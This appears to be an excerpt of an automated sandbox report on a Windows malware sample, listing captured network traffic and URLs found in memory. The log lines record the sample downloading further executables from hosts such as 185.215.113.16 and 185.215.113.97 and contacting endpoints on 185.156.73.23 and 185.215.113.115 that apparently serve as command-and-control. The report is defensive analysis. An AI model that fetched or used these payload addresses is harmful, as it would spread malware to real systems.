Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16

Source: C:\Users\user\Desktop\random.exe

Code function: 0_2_00D4CE44 InternetReadFile,SetEvent,GetLastError,SetEvent,

0_2_00D4CE44

Source: global traffic	HTTP traffic detected: GET /geoip HTTP/1.1Host: api.ip.sbConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /mine/random.exe HTTP/1.1Host: 185.215.113.16Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /files/unique2/random.exe HTTP/1.1Host: 185.215.113.97
Source: global traffic	HTTP traffic detected: GET /files/SQL_gulong1/random.exe HTTP/1.1Host: 185.215.113.97
Source: global traffic	HTTP traffic detected: GET /files/osint1618/random.exe HTTP/1.1Host: 185.215.113.97
Source: global traffic	HTTP traffic detected: GET /luma/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: GET /steam/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: GET /well/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.115Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /test/exe/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: GET /files/none1/random.exe HTTP/1.1Host: 185.215.113.97
Source: global traffic	HTTP traffic detected: GET /mine/random.exe HTTP/1.1Host: 185.215.113.16Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /files/none/random.exe HTTP/1.1Host: 185.215.113.97
Source: global traffic	HTTP traffic detected: GET /add?substr=mixtwo&s=three&sub=emp HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: 1Host: 185.156.73.23Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /dll/key HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: 1Host: 185.156.73.23Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /dll/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: 1Host: 185.156.73.23Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: CHost: 185.156.73.23Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.115Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: CHost: 185.156.73.23Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: CHost: 185.156.73.23Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /steam/random.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: CHost: 185.156.73.23Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /mine/random.exe HTTP/1.1Host: 185.215.113.16Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: CHost: 185.156.73.23Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: CHost: 185.156.73.23Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /mine/random.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: CHost: 185.156.73.23Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.115Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: CHost: 185.156.73.23Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: CHost: 185.156.73.23Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /steam/random.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.115Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: CHost: 185.156.73.23Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /mine/random.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: GET /steam/random.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.115Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: CHost: 185.156.73.23Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /mine/random.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.115Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /soft/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: dHost: 185.156.73.23Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /soft/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: sHost: 185.156.73.23Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /mine/random.exe HTTP/1.1Host: 185.215.113.16Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /files/martin2/random.exe HTTP/1.1Host: 185.215.113.97
Source: global traffic	HTTP traffic detected: GET /mine/random.exe HTTP/1.1Host: 185.215.113.16Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /mine/random.exe HTTP/1.1Host: 185.215.113.16Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /mine/random.exe HTTP/1.1Host: 185.215.113.16Connection: Keep-Alive

Source: global traffic	DNS traffic detected: DNS query: rebeldettern.com
Source: global traffic	DNS traffic detected: DNS query: ignoredshee.com
Source: global traffic	DNS traffic detected: DNS query: api.ip.sb
Source: global traffic	DNS traffic detected: DNS query: prod.classify-client.prod.webservices.mozgcp.net

Source: unknown

HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: rebeldettern.com

Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 07 Feb 2025 16:59:26 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeX-Frame-Options: SAMEORIGINReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=eb%2BBEtRlYEhNqJJJIUATZn6j5b%2BROD%2FF8ckcAbLBTlxEjmAUoNcUYMfLkf3rgtascNw7RtzfoZwumbM1DPYOpdcmvPrNsyUxq%2B547fATooQNjHrRKUeg%2BSmtQXwSIX4GrwqE"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 90e4ee2fdb0e8cda-EWR
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 07 Feb 2025 16:59:33 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeX-Frame-Options: SAMEORIGINReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bb5826fJgVYqu9cuWa6wP%2F8OycN9Nr2yb6i7aq3bP5d%2F%2FcVQq9e%2FAYlrsQaQdq9DKAKKgHWZzUR4GCAwbLkBvGb2qkVJaj3XComZBFSEfYbMU3ouHzC%2FHqHpdMcX5VkcsHI%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 90e4ee5c3ee04368-EWR
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 07 Feb 2025 16:59:48 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeX-Frame-Options: SAMEORIGINReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wLIU6MOjke8ibFP93L3vHpVXp0CTO3yAlggDnPlH6NBMZWRls6VpfXzjQ6JENzHVJD8nsZfi28CPRUXOtAsepLFwgoWINVr3gys%2BwdX1n%2Bz7e%2BoC1mGIViCgPQ8CzJW%2BXxQ%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 90e4eebe196443d7-EWR
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 07 Feb 2025 17:00:22 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeX-Frame-Options: SAMEORIGINReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fWS0ST08MvD5M%2BoXnn1oKSolKX6SVgkI0%2FOUomkaEPCLfOk0hLjVaqgJY8FspVFYBv%2BGd6fUTLe7XtYM6bL5sJERgTIC7IX%2B1r1bOWOhAfu2hlDNiBJLD4v7Txie%2FKr4cl8%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 90e4ef92f81e0f45-EWR

Source: 6d81c0d08d.exe, 00000015.00000002.2949932031.0000000005751000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://103.84.89.222:33791/
Source: b7668220f8.exe, 00000014.00000003.2936131169.00000000056B4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.156.73.23/files/download
Source: mshta.exe, 00000002.00000002.1429308826.0000000002AF2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1424979860.0000000002AF2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.2
Source: 327981c77b.exe, 00000019.00000002.2527448311.000000000153E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.115
Source: 327981c77b.exe, 0000002E.00000002.2848956151.000000000181D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.115/
Source: 327981c77b.exe, 00000019.00000002.2527448311.00000000015A4000.00000004.00000020.00020000.00000000.sdmp, 327981c77b.exe, 0000002E.00000002.2848956151.000000000181D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.115/c4becf79229cb002.php
Source: 327981c77b.exe, 00000019.00000002.2527448311.0000000001597000.00000004.00000020.00020000.00000000.sdmp, 327981c77b.exe, 0000002E.00000002.2848956151.000000000181D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.115/c4becf79229cb002.php/
Source: 327981c77b.exe, 00000019.00000002.2527448311.000000000153E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.115/c4becf79229cb002.php1
Source: 327981c77b.exe, 0000002E.00000002.2848956151.000000000181D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.115/c4becf79229cb002.php2G
Source: 327981c77b.exe, 0000002E.00000002.2848956151.000000000181D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.115/c4becf79229cb002.phpFG
Source: 327981c77b.exe, 0000002E.00000002.2848956151.000000000181D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.115/c4becf79229cb002.phpI
Source: 327981c77b.exe, 00000019.00000002.2527448311.00000000015A4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.115/c4becf79229cb002.phpR
Source: 327981c77b.exe, 00000019.00000002.2527448311.00000000015A4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.115/c4becf79229cb002.phpf
Source: 327981c77b.exe, 0000002E.00000002.2848956151.000000000181D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.115/c4becf79229cb002.phpnG
Source: 327981c77b.exe, 00000019.00000002.2527448311.00000000015A4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.115/c4becf79229cb002.phpz
Source: 327981c77b.exe, 0000002E.00000002.2848956151.000000000181D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.1155H
Source: powershell.exe, 00000006.00000002.1465861464.00000000056B3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1465861464.000000000554D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000023.00000002.2670950319.0000000004E56000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000023.00000002.2670950319.0000000004EA0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16
Source: 376bb929a5.exe, 00000018.00000003.2931195758.000000000130E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/
Source: mshta.exe, 00000026.00000003.2822639076.00000194B7481000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/mine/random.exe
Source: 376bb929a5.exe, 00000018.00000003.2931506590.0000000001303000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/mine/random.exeW
Source: 376bb929a5.exe, 00000018.00000003.2931195758.000000000130E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/mine/random.exee
Source: 376bb929a5.exe, 00000018.00000003.2931506590.0000000001303000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/mine/random.exep
Source: 376bb929a5.exe, 00000018.00000003.2931195758.000000000130E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/p
Source: 376bb929a5.exe, 00000018.00000003.2931506590.0000000001303000.00000004.00000020.00020000.00000000.sdmp, 376bb929a5.exe, 00000018.00000003.2931195758.000000000130E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/steam/random.exe
Source: 376bb929a5.exe, 00000018.00000003.2931195758.000000000130E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/steam/random.exe-
Source: 0a633717d1.exe, 00000017.00000003.2412770478.0000000005937000.00000004.00000800.00020000.00000000.sdmp, 376bb929a5.exe, 00000018.00000003.2501375615.0000000005AA7000.00000004.00000800.00020000.00000000.sdmp, 376bb929a5.exe, 0000001C.00000003.2729963633.000000000579D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: 0a633717d1.exe, 00000017.00000003.2412770478.0000000005937000.00000004.00000800.00020000.00000000.sdmp, 376bb929a5.exe, 00000018.00000003.2501375615.0000000005AA7000.00000004.00000800.00020000.00000000.sdmp, 376bb929a5.exe, 0000001C.00000003.2729963633.000000000579D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: 0a633717d1.exe, 00000017.00000003.2412770478.0000000005937000.00000004.00000800.00020000.00000000.sdmp, 376bb929a5.exe, 00000018.00000003.2501375615.0000000005AA7000.00000004.00000800.00020000.00000000.sdmp, 376bb929a5.exe, 0000001C.00000003.2729963633.000000000579D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: 0a633717d1.exe, 00000017.00000003.2412770478.0000000005937000.00000004.00000800.00020000.00000000.sdmp, 376bb929a5.exe, 00000018.00000003.2501375615.0000000005AA7000.00000004.00000800.00020000.00000000.sdmp, 376bb929a5.exe, 0000001C.00000003.2729963633.000000000579D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: 0a633717d1.exe, 00000017.00000003.2412770478.0000000005937000.00000004.00000800.00020000.00000000.sdmp, 376bb929a5.exe, 00000018.00000003.2501375615.0000000005AA7000.00000004.00000800.00020000.00000000.sdmp, 376bb929a5.exe, 0000001C.00000003.2729963633.000000000579D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: 0a633717d1.exe, 00000017.00000003.2412770478.0000000005937000.00000004.00000800.00020000.00000000.sdmp, 376bb929a5.exe, 00000018.00000003.2501375615.0000000005AA7000.00000004.00000800.00020000.00000000.sdmp, 376bb929a5.exe, 0000001C.00000003.2729963633.000000000579D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: 0a633717d1.exe, 00000017.00000003.2412770478.0000000005937000.00000004.00000800.00020000.00000000.sdmp, 376bb929a5.exe, 00000018.00000003.2501375615.0000000005AA7000.00000004.00000800.00020000.00000000.sdmp, 376bb929a5.exe, 0000001C.00000003.2729963633.000000000579D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: powershell.exe, 00000006.00000002.1468172862.000000000638A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1544695281.0000025990073000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1544695281.00000259901B5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000023.00000002.2749262657.0000000005B78000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: 0a633717d1.exe, 00000017.00000003.2412770478.0000000005937000.00000004.00000800.00020000.00000000.sdmp, 376bb929a5.exe, 00000018.00000003.2501375615.0000000005AA7000.00000004.00000800.00020000.00000000.sdmp, 376bb929a5.exe, 0000001C.00000003.2729963633.000000000579D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: 0a633717d1.exe, 00000017.00000003.2412770478.0000000005937000.00000004.00000800.00020000.00000000.sdmp, 376bb929a5.exe, 00000018.00000003.2501375615.0000000005AA7000.00000004.00000800.00020000.00000000.sdmp, 376bb929a5.exe, 0000001C.00000003.2729963633.000000000579D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: powershell.exe, 00000023.00000002.2670950319.0000000004C66000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: 6d81c0d08d.exe, 00000015.00000003.2879389127.0000000009327000.00000004.00000020.00020000.00000000.sdmp, 6d81c0d08d.exe, 00000015.00000003.2663398019.0000000009326000.00000004.00000020.00020000.00000000.sdmp, 6d81c0d08d.exe, 00000015.00000003.2875383458.0000000009327000.00000004.00000020.00020000.00000000.sdmp, 6d81c0d08d.exe, 00000015.00000003.2878608556.0000000009327000.00000004.00000020.00020000.00000000.sdmp, 6d81c0d08d.exe, 00000015.00000003.2663347895.0000000009312000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://purl.oen
Source: 6d81c0d08d.exe, 00000015.00000002.2949932031.0000000005751000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/actor/next
Source: 6d81c0d08d.exe, 00000015.00000002.2949932031.0000000005751000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
Source: 6d81c0d08d.exe, 00000015.00000002.2949932031.0000000005751000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing
Source: 6d81c0d08d.exe, 00000015.00000002.2949932031.0000000005751000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/faultX
Source: 6d81c0d08d.exe, 00000015.00000002.2949932031.0000000005751000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous
Source: powershell.exe, 00000006.00000002.1465861464.0000000005321000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1504406179.0000025980001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000023.00000002.2670950319.0000000004B11000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: 6d81c0d08d.exe, 00000015.00000002.2949932031.0000000005751000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/
Source: powershell.exe, 00000023.00000002.2670950319.0000000004C66000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
